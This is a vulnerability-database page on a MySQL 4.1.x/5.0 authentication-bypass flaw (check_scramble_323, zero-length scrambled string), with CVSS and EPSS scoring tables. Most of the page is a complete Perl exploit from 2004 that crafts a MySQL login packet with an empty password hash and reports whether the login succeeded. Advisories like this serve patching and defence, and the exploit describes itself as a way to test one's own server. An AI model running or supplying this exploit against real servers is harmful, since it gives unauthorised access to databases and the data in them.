CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The check_scramble_323 function in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to bypass authentication via a zero-length scrambled string.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
4.19%
–
–
2022-04-03
–
–
4.19%
–
–
2022-07-17
–
–
4.19%
–
–
2023-03-12
–
–
–
92.68%
–
2023-05-14
–
–
–
92.68%
–
2023-06-18
–
–
–
91.03%
–
2023-10-01
–
–
–
91.03%
–
2024-01-14
–
–
–
89.25%
–
2024-01-21
–
–
–
89.25%
–
2024-06-02
–
–
–
89.25%
–
2024-06-02
–
–
–
89.25%
–
2024-12-22
–
–
–
55.84%
–
2025-01-19
–
–
–
55.84%
–
2025-03-18
–
–
–
–
53.96%
2025-03-18
–
–
–
–
53.96,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2004-07-09 22h00 +00:00 Author : Eli Kara EDB Verified : Yes
#!/usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# the login packet sent to the server and it's reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# elik beyondsecurity com
#
use strict;
use IO::Socket::INET;
usage() unless ((@ARGV >= 1) || (@ARGV <= 3));
my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
usage();
}
my $port = shift(@ARGV);
if (!$port)
{
$port = 3306; print "Using default MySQL port (3306)\n";
}
# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
# receive greeting
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
print "Not allowed to connect to MySQL!\n";
exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";
# here we define the login OK reply
# my $login_ok = "\x01\x00\x00\x02\xFE";
# break the username string into chars and rebuild it
my $binuser = pack("C*", unpack("C*", $username));
# send login caps packet with password
my $packet = "\x85\xa6".
"\x03\x00\x00".
"\x00".
"\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash
substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1)
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send $socket, $packet, 0;
# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);
my @list_bytes = unpack("C*", $reply);
#print "The fifth byte is: ", $list_bytes[4], "\n";
if (length(@list_bytes) >= 4)
{
print "Response insufficent\n";
}
#if ($reply eq $login_ok)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
print "Received OK reply, authentication successful!!\n";
}
else
{
print "Authentication failed!\n";
}
# close
close($socket);
sub usage
{
# print usage information
print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n
<username> - The DB username to authenticate as
<host> - The host to connect to
[port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";
exit(1);
}
###
# do a hexdump of a string (assuming it's binary)
###
sub HexDump
{
my $buffer = $_[0];
# unpack it into chars
my @up = unpack("C*", $buffer);
my $pos=0;
# calculate matrix sizes
my $rows = int(@up/16);
my $leftover = int(@up%16);
for( my $row=0; $row < $rows ; $row++, $pos+=16)
{
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+15];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
# print last line
printf("%08X\t", $pos);
my @values = @up[$pos .. $pos+$leftover-1];
my @line;
foreach my $val (@values)
{
push(@line, sprintf("%02X", $val));
}
print join(' ', @line), "\n";
}
# milw0rm.com [2004-07-10]